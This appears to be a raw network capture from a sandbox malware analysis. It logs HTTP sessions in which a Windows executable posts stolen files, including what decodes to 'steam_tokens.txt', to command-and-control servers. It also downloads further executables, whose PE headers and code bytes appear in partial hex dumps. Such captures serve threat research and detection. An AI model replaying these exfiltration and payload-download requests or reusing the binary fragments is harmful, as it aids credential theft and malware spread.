Dec 8, 2024 19:52:34.204611063 CET	467	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHJDAAEGIDHDGCAAFCBA Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 44 41 41 45 47 49 44 48 44 47 43 41 41 46 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 44 41 41 45 47 49 44 48 44 47 43 41 41 46 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 44 41 41 45 47 49 44 48 44 47 43 41 41 46 43 42 41 2d 2d 0d 0a Data Ascii: ------FHJDAAEGIDHDGCAAFCBAContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------FHJDAAEGIDHDGCAAFCBAContent-Disposition: form-data; name="message"files------FHJDAAEGIDHDGCAAFCBA--
Dec 8, 2024 19:52:34.651544094 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 8, 2024 19:52:34.672436953 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAAKEBGDAFHIIDHIIECF Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="file"------AAAKEBGDAFHIIDHIIECF--
Dec 8, 2024 19:52:35.604266882 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 8, 2024 19:52:35.635561943 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAFIEGIECGCBKFIEBGCA Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 2d 2d 0d 0a Data Ascii: ------BAFIEGIECGCBKFIEBGCAContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------BAFIEGIECGCBKFIEBGCAContent-Disposition: form-data; name="message"ybncbhylepme------BAFIEGIECGCBKFIEBGCA--
Dec 8, 2024 19:52:36.075350046 CET	271	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 68 Keep-Alive: timeout=5, max=86 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49757	185.215.113.16	80	7396	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:52:36.198656082 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Dec 8, 2024 19:52:37.537177086 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 08 Dec 2024 18:52:37 GMT Content-Type: application/octet-stream Content-Length: 3251712 Last-Modified: Sun, 08 Dec 2024 18:43:44 GMT Connection: keep-alive ETag: "6755e8e0-319e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 b0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf1@1H2@Wk11 @.rsrc@.idata @ybivbako**@iccljchg1x1@.taggant01"\|1@
Dec 8, 2024 19:52:37.537199020 CET	124	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 19:52:37.539371014 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 19:52:37.539383888 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 19:52:37.539396048 CET	248	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 19:52:37.539838076 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 19:52:37.539856911 CET	1236	IN	Data Raw: 76 fc aa 99 3b fd 75 66 af a4 ad 01 1f bf ee 99 9b 66 d9 df e2 22 99 06 e4 3a 11 aa b0 7e a9 81 56 fc aa 99 3b fd 75 66 af a4 ad 01 27 bf ee 99 9b 3e da df e2 22 79 06 e4 3a 11 0a b1 7e a9 81 36 fc aa 99 3b fd 75 66 af a4 ad 01 2f bf ee 99 9b ce Data Ascii: v;uff":~V;uf'>"y:~6;uf/"Y:j~;uf7N"9:~;uf?":*~;ufG":~;ufO":~;ufW
Dec 8, 2024 19:52:37.539869070 CET	1236	IN	Data Raw: e2 22 d9 01 e4 3a 11 ea be 7e a9 81 96 f7 aa 99 3b fd 75 66 af a4 b9 01 ab c0 ee 99 9b 9e d7 df e2 22 b9 01 e4 3a 11 4a bf 7e a9 81 76 f7 aa 99 3b fd 75 66 af a4 c5 01 bf c0 ee 99 9b 72 de df e2 22 99 01 e4 3a 11 aa bf 7e a9 81 56 f7 aa 99 3b fd Data Ascii: ":~;uf":J~v;ufr":~V;uf"y:~6;uf"Y:j~;uf^"9:~;uf":*~;uf/":~;u
Dec 8, 2024 19:52:37.539978027 CET	1236	IN	Data Raw: af a4 e5 01 13 c5 ee 99 9b 7e dc df e2 22 f9 fc e3 3a 11 8a cd 7e a9 81 b6 f2 aa 99 3b fd 75 66 af a4 b9 01 53 c5 ee 99 9b 56 dd df e2 22 d9 fc e3 3a 11 ea cd 7e a9 81 96 f2 aa 99 3b fd 75 66 af a4 b1 01 67 c5 ee 99 9b 06 d6 df e2 22 b9 fc e3 3a Data Ascii: ~":~;ufSV":~;ufg":J~v;ufs":~V;ufV"y:~6;uf."Y:j~;ufV"9:~;uf":
Dec 8, 2024 19:52:37.539989948 CET	1236	IN	Data Raw: f9 3a a9 99 40 97 6c 1b e1 0a b1 99 e2 b0 98 82 92 8d ac 99 a9 3a cb 99 e2 3a 91 a2 2c 3d a9 f8 9a 5c a9 99 e2 98 06 5d af 06 76 66 af 8f 34 86 6e 7f b5 f6 a5 06 76 66 af 06 76 66 af f2 d9 1f 29 3a 6c 66 af 06 76 66 af 06 76 66 af 8f 34 86 66 1e Data Ascii: :@l::,=\]vf4nvfvf):lfvfvf4fXJt9%9erfIZn]vfvfvf4n&(J9fvfvf4f&:Z2om+33IZ@=':{OmB4`
Dec 8, 2024 19:52:37.656929970 CET	1236	IN	Data Raw: ef c3 ee 79 aa 7f a5 9a e2 3a a9 24 30 12 2f 63 57 7e 34 ef be c5 6b c5 a3 bd a1 9c 54 5a 36 db e4 bd a3 aa 6b 7f 81 54 1d 5a a9 99 6f 7f 71 a9 25 7f 71 00 6c 4e b1 5f 27 42 ab 99 cd 52 13 9c 4a a2 2a df e2 00 ef 81 e3 c7 f6 61 e2 af 91 04 e5 22 Data Ascii: y:$0/cW~4kTZ6kTZoq%qlN_'BRJa":&0$9oY`$074r3`&H2a}aTmFo:oq`mmJmYm*JTN4k,Zt:WmJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49758	185.215.113.206	80	7396	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:52:43.268903017 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAA Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 2d 2d 0d 0a Data Ascii: ------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GCFIIEBKEGHJJJJJJDAA--
Dec 8, 2024 19:52:45.097528934 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49766	185.215.113.43	80	7716	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:04.537375927 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 8, 2024 19:53:05.881231070 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 08 Dec 2024 18:53:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49772	185.215.113.43	80	7716	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:07.515571117 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 34 42 30 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB32974B05E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 8, 2024 19:53:08.878036022 CET	888	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 08 Dec 2024 18:53:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 62 39 0d 0a 20 3c 63 3e 31 30 31 33 32 33 38 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 63 32 39 63 37 31 39 31 63 65 36 30 31 62 33 31 38 31 63 30 33 34 32 61 63 66 31 63 31 32 65 62 37 66 35 39 61 35 35 33 36 65 36 23 31 30 31 33 32 33 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 64 32 61 63 37 31 35 31 34 65 64 30 37 62 30 31 63 31 33 30 33 35 62 38 63 65 65 65 62 33 64 61 35 61 35 39 61 35 35 33 36 65 36 23 31 30 31 33 32 34 38 30 34 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 65 32 65 63 31 31 30 31 61 65 36 30 32 62 32 31 61 31 64 30 33 37 65 39 64 64 64 63 31 31 65 61 30 39 64 39 61 34 30 33 64 62 32 [TRUNCATED] Data Ascii: 2b9 <c>1013238001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9c29c7191ce601b3181c0342acf1c12eb7f59a5536e6#1013239001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9d2ac71514ed07b01c13035b8ceeeb3da5a59a5536e6#1013248041+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9e2ec1101ae602b21a1d037e9dddc11ea09d9a403db2#1013249001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1013250001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1013251001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1013252001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49778	31.41.244.11	80	7716	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:09.115180969 CET	66	OUT	GET /files/7658082748/wTMEVe8.exe HTTP/1.1 Host: 31.41.244.11
Dec 8, 2024 19:53:10.479212046 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 08 Dec 2024 18:53:10 GMT Content-Type: application/octet-stream Content-Length: 4122624 Last-Modified: Sun, 08 Dec 2024 17:35:35 GMT Connection: keep-alive ETag: "6755d8e7-3ee800" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 08 00 c7 b7 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a0 02 00 00 e0 00 00 00 00 00 00 c2 e4 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 3f 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 3c 03 00 3c 00 00 00 00 a0 03 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 03 00 8c 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 ff 02 00 18 00 00 00 98 c2 02 00 c0 00 00 00 00 00 00 00 00 00 00 00 ac 3e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELUg@0?@<<>.text `.rdata@@.data'`L@.tlsd@.rsrcf@@.reloc h@B.bss@.bss!8!@
Dec 8, 2024 19:53:10.479229927 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 19:53:10.479242086 CET	1236	IN	Data Raw: c4 0c 01 e7 83 c7 1c eb 6b 66 66 66 2e 0f 1f 84 00 00 00 00 00 89 f8 83 c8 0f 83 f8 17 bd 16 00 00 00 0f 43 e8 3d ff 0f 00 00 72 19 8d 45 24 50 e8 81 86 00 00 83 c4 04 8d 58 23 83 e3 e0 89 43 fc eb 10 66 90 8d 45 01 50 e8 68 86 00 00 83 c4 04 89 Data Ascii: kfff.C=rE$PX#CfEPh\$\|$,l$0WVSl$t$L$D$,5\|$0\|$C}L$1tE1i[1i[i[1iL[1i[i[19
Dec 8, 2024 19:53:10.479366064 CET	672	IN	Data Raw: 41 04 83 7c 03 0c 00 0f 85 7a 01 00 00 b9 c0 01 00 00 23 4c 03 14 83 f9 40 0f 84 94 00 00 00 83 7c 24 04 01 89 e9 83 d9 00 0f 8c 84 00 00 00 bb 01 00 00 00 eb 36 66 66 2e 0f 1f 84 00 00 00 00 00 0f b6 c0 8b 11 50 ff 52 0c 83 f8 ff 0f 84 14 01 00 Data Ascii: A\|z#L@\|$6ff.PR9}4T$@@L8D@Q :tQ0~MI j)D$@@D$1\$@L8jt$Vt$LP$11$\|\|$\|p
Dec 8, 2024 19:53:10.479377985 CET	1236	IN	Data Raw: 08 50 e8 da 1b 00 00 83 c4 04 89 c7 8b 4c 24 0c 85 c9 74 11 8b 01 ff 50 08 85 c0 74 08 8b 10 89 c1 6a 01 ff 12 8b 06 8b 40 04 8d 0c 06 0f be 54 06 40 8b 44 06 38 c7 44 24 08 00 00 00 00 89 44 24 0c 8b 07 83 ec 18 f2 0f 10 44 24 20 f2 0f 11 44 24 Data Ascii: PL$tPtj@T@D8D$D$D$ D$\$T$L$L$$P$<$JD1\|8D#Du8Wu@L8tPL$1~ ^_[CCDCDjS
Dec 8, 2024 19:53:10.479388952 CET	1236	IN	Data Raw: 8d 58 23 83 e3 e0 89 43 fc eb 10 66 90 8d 46 01 50 e8 58 7a 00 00 83 c4 04 89 c3 89 5c 24 20 89 7c 24 30 89 74 24 34 57 ff 74 24 10 53 e8 9b e5 00 00 83 c4 0c 01 df 8d 5c 24 20 c6 07 00 8b 4c 24 20 8b 44 24 30 89 c7 81 f7 35 02 00 00 8b 54 24 34 Data Ascii: X#CfFPXz\$ \|$0t$4Wt$S\$ L$ D$05T$4T$C~L$1tF1i,[1i[i[1iL[1i[i[19ul$L$ti4[1i[i[11t
Dec 8, 2024 19:53:10.479403973 CET	448	IN	Data Raw: 24 1c 89 1c 24 6a 01 e8 db f0 00 00 83 c4 04 89 c6 e8 f3 05 00 00 53 6a 00 57 56 ff 70 04 ff 30 e8 3c f3 00 00 83 c4 18 89 c6 8b 4c 24 04 31 e1 e8 d9 75 00 00 89 f0 83 c4 08 5e 5f 5b c3 cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 38 8b 74 Data Ascii: $$jSjWVp0<L$1u^_[USWV8t$LiC1D$4t$PeL$ql2 \2$19\|$L$)\$EL$ET$L78tPD$p\|7tD$L7<t9
Dec 8, 2024 19:53:10.479477882 CET	1236	IN	Data Raw: 52 0c 66 83 f8 ff 0f 84 9b 01 00 00 89 e8 83 c0 ff 89 f1 83 d1 ff 39 eb ba 00 00 00 00 19 f2 89 c5 89 ce 8b 7c 24 4c 7c 90 c7 44 24 08 00 00 00 00 c7 44 24 0c 00 00 00 00 8b 14 24 85 d2 0f 84 be 00 00 00 31 f6 8b 5c 24 50 66 66 66 66 66 66 2e 0f Data Ascii: Rf9\|$L\|D$D$$1\$Pffffff.$L$L@l8\$L$PR0M 9t'M0~JM z9ffff.UPR<$fD$\$tC9m1f
Dec 8, 2024 19:53:10.479491949 CET	1236	IN	Data Raw: cc cc cc cc cc 56 89 ce 8b 44 24 08 c7 01 78 b1 42 00 83 c1 04 c7 46 08 00 00 00 00 c7 46 04 00 00 00 00 83 c0 04 51 50 e8 8f c3 00 00 83 c4 08 c7 06 58 b1 42 00 89 f0 5e c2 04 00 cc cc cc cc cc cc cc cc cc 56 89 ce 8b 44 24 08 c7 01 78 b1 42 00 Data Ascii: VD$xBFFQPXB^VD$xBFFQPO^VxBAP\|$tVn^ICESWV iC1D$@\|8P
Dec 8, 2024 19:53:10.479504108 CET	1236	IN	Data Raw: 00 89 f0 83 c4 04 5e 5f 5b 5d c2 08 00 e8 9f fa ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 04 8b 54 24 08 89 10 89 48 04 c2 08 00 8b 44 24 04 8b 10 8b 40 04 8b 49 04 33 48 04 33 54 24 08 09 ca 0f 94 c0 c2 08 00 cc cc cc cc cc 53 Data Ascii: ^_[]D$T$HD$@I3H3T$SWVt$ D$iC1T$PWR$L$VI3J3L$1j^_[USWViC1D$WD$W$t$8Yl$4\$0w \|$D$
